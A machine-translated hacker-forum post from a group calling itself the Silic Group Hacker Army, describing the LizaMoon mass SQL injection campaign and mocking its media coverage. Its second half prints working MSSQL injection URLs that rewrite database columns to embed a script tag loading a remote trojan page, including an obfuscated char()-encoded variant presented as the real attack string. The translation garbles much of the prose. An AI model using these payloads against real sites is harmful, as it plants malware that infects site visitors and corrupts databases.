Fr0m: http://bbs.blackbap.org/viewthread.php? Tid = 1996 & rpid = 14721 & ordertype = 0 & page = 1 # pid14721
Author: YoCo Smart
On that day, I saw the discussion in the core Group of the Silic Group, and then I saw a member of Q Group asking for lizamoon attack scripts in my MSN discussion Group, I know this is the case. At the beginning, I did not plan to write lizamoon, because this thing is nothing in the circle. After reading the article I wrote, I guess it should be a joke, and it is not a profound technology at all, injection is used to mount Trojans. After writing scripts to scan and batch Mount Trojans in batches, although you do not know which of the following Trojans are infected, the method is obviously a professional Trojan, the next day, all the trojan pages disappear, and the trojan connection cannot be accessed.
There are three reasons why the media hypes so much. The first reason is that this Trojan can be described in a thunderous manner (I have added these two evil words to steal the bell, its speed is even worse than 0-day. Second, Apple's iTunes site is included in the affected site, which is quite surprising. Third, due to the nature of the media itself, which is eye-catching and hyping, and exaggerated reports from security vendors. What else 360 has been able to defend against lizamoon attacks. For an hour, I can write a software program to defend against Lisa's moon injection and Trojan. Aren't you purely talking about it? It's funny to hear it. Can you defend against Japanese nuclear radiation together?
Author: YoCo Smart
From: Silic Group Hacker Army
Website: http://blackbap.org (reprinted please indicate the source)
This is the result of Google's search when the iTunes website was infected with a Trojan on the same day:
They discussed it in the group that day, And then Tom said that when I waited for my article, I was very puzzled because I didn't say I was about to write an article about lizamoon. But I checked it and there was no relevant information in China. Tom also saw the batch Attack Script.CodeBut she said she didn't have time to write papers and wouldn't say in the group that the Friends in the core group had been together for several years and there was no need to hide them. I simply wrote lizamoon and shared it, save this and I want code and I want scripts, and I want to give them one by one.
I have talked so much nonsense, but I still want to say that this attack method is really common and can even be described as weak. As I said, his strength mainly lies in the speed, thanks to his powerful batch Attack Script Writing. Batch scan for batch injection.
Well, the body is divided into two parts. The first part is the information and analysis I learned before I got the script from a Turkish friend. The second part is the core part. I don't want to talk about it more, I only paste the injection code for more detailed analysis. I don't think it is necessary. Why? Once you read the code, you can see the injection Code that directly embeds the trojan code into the database.
Detailed description of LizaMoon SQL Injection (Lisa moon Injection)
Author: YoCo Smart
From: Silic Group Hacker Army
Website: http://blackbap.org (reprinted please indicate the source)
I. Early features and their understanding
II. Specific injection code and Methods
I features and understanding
Why do media and security vendors want to speculate on Lisa moon, or what Lisa moon is or how Lisa moon is.
Lisa moon is a literal word. The original Article is lizamoon. I don't think I need to explain it again. So how does lizamoon come from? You can see it after reading the Code:
"</Title> <script src =" http://lizamoon.com/ur. Php"> </Script>"
Copy code
Have you seen this URL? That's it. This ur. php is the trojan page, and this Code is the trojan Code. According to a friend from the Discussion Group I am using MSN, this trojan page (not a web site, it is a page. There is a difference between a url and a page) There are actually 4.5 millions.
At the beginning, many websites were implanted with this Code. Later, it was found that hosts was changed.
127.0.0.1 lizamoon.com
Copy code
According to your feedback, Trojan events usually occur in systems in the mssql2005 + asp.net environment, and even hosts are modified. In this case, there are two possibilities.
1. Get webshell and use asp.net.VulnerabilitiesElevation of Privilege
2. mssql2005 Privilege Escalation 0day
Many people think that mssql2005 has 0 days, and even Microsoft has published lizamoon security notices on the database page, which caused some panic.
However, we ignored a problem. People with brains should have noticed that the iTunes website was also infected with Trojans and was very hurt. Does iTunes also use mssql?
Besides banner
Server: AkamaiGHost
Copy code
If you change the website directory to any lower-case directory, you can access the website in upper case by 404. Obviously, mssql cannot be used for Unix. That is to say, there is a 0-day hype in mssql2005, which will not be broken.
So what is the problem? Here, I think everyone can laugh, but it is actually the most common injection.
How do you find an injection point?
Inject the query administrator password, log on to the background to obtain webshell, and escalate the permission to the server. Right?
This is not the case. lizamoon directly updates the trojan code to the database without the Administrator information.
The reason why lizamoon selected mssql is that mssql does not need to guess the table like MySQL, and the name of the table segment can be burst out, while ASP + access can only be brute-force guessed.
Let alone foreign countries, China seldom used mssql2000, a product of the Win98 age more than a decade ago. This is why the website servers infected with Trojans are installed with mssql2005.
As for iTunes, no mssql is used for Trojans, I personally think that as long as iTunes is not used for access, and there are injection points, what's strange if it is found in the management background, and the webshell is obtained, and the home page cannot be guaranteed. Although my explanation is not official, it is true.
I think you don't need to watch it anymore, because I am going to talk about the second part, injecting code.
II specific injection code and Methods
First, let's assume (amount... There are already millions of actual Trojan examples. I think I will find another actual example. Will it be scolded for taking my pants off and farting? Let me assume it is okay)
Suppose the trojan page is here: http://blackbap.org/ur.php
Let's assume that the injection point is here: http://blackbap.org/ SQL .aspx? Id = 100
The injection points here mean that the obtained variables are not strictly filtered... (I am X. Is this nonsense? Is there anything else in the injection point? I # % $ & * E $ % R # $ # @ % $ ^)
The following injection statement is used:
Http://blackbap.org/ SQL .aspx? Id = 100 update [YOURTABLE] set AltText = REPLACE (cast (AltText as varchar (8000 )), cast (</title> <script src = "http://blackbap.org/ur.php"> </script> as varchar (8000), cast (char (32) as varchar (8 )))-
Copy code
I don't think I need to explain the specific code? Everyone knows that this is to insert a trojan connection to each record in the table. If you don't know it, I think it will be enough for you to apply it?
The question here is how hackers know the name of the database table segment. Amount... This problem is actually very confusing. Anyone who understands mssql injection should know that mssql can obtain the table segment name through queries, rather than brute force guesses like access.
This is the strength of the lizamoon script for batch injection of Trojan attacks. It is also the only thing lizamoon deserves praise.
As for the above statements, I haven't finished it yet. Actually, I have seen two versions of the batch Attack Script. Although they are similar, there is a difference between them.
The script on the hand of a Turkish hacker is the injection Code provided above, and the script on the hand of the Russian hacker I see is enclosed by quotation marks in the attack code, that is:
Http://blackbap.org/ SQL .aspx? Id = 100 update [YOURTABLE] set AltText = REPLACE (cast (AltText as varchar (8000 )), cast ("</title> <script src =" http://blackbap.org/ur.php "> </script>" as varchar (8000), cast (char (32) as varchar (8 )))-
Copy code
The trojan Code contains quotation marks, which is the difference I see. To be honest, I don't know the function of this quotation mark-_, aha. This joke is cool. As for which one is an authentic rumor, I think you will know it by yourself, because the key issue in the injection code I want to talk about is not here. It's just an episode.
From the most retarded point of view, if your browser is IE8 or later, you use a script-containing statement like this. Do you think the browser will prompt you if there is a warning such as the address has been modified across sites. Even if your local Browser allows you to do so, there is still a problem with the quotation marks in that statement. I will not talk about it, so the attack statements in the actual script are as follows:
Http://blackbap.org/ SQL .aspx? Id = 100 update [YOURTABLE] set AltText = REPLACE (cast (AltText as varchar (8000), cast (char (60) + char (47) + char (116) + char (105) + char (116) + char (108) + char (101) + char (62) + char (60) + char (115) + char (99) + char (114) + char (105) + char (112) + char (116) + char (32) + char (115) + char (114) + char (99) + char (61) + char (34) + char (104) + char (116) + char (116) + char (112) + char (58) + char (47) + char (47) + char (98) + char (108) + char (97) + char (99) + char (107) + char (98) + char (97) + char (112) + char (46) + char (111) + char (114) + char (103) + char (47) + char (117) + char (114) + char (46) + char (112) + char (104) + char (112) + char (34) + char (62) + char (60) + char (47) + char (115) + char (99) + char (114) + char (105) + char (112) + char (116) + char (62) as varchar (8000), cast (char (32) as varchar (8 )))-
Copy code
Okay, I think there is nothing to talk about lizamoon. This is the core code in the script.
If I want to continue talking about the basic syntax of perl scripts and the basic syntax of mssql, how does perl scan websites to display mssql table names? By the way, how can I use aspx to escalate permissions? Now, the article is over. Remember all rights reserved, reprinted please indicate the original address: http://bbs.blackbap.org/viewthread.php? Tid = 1996
Send a picture: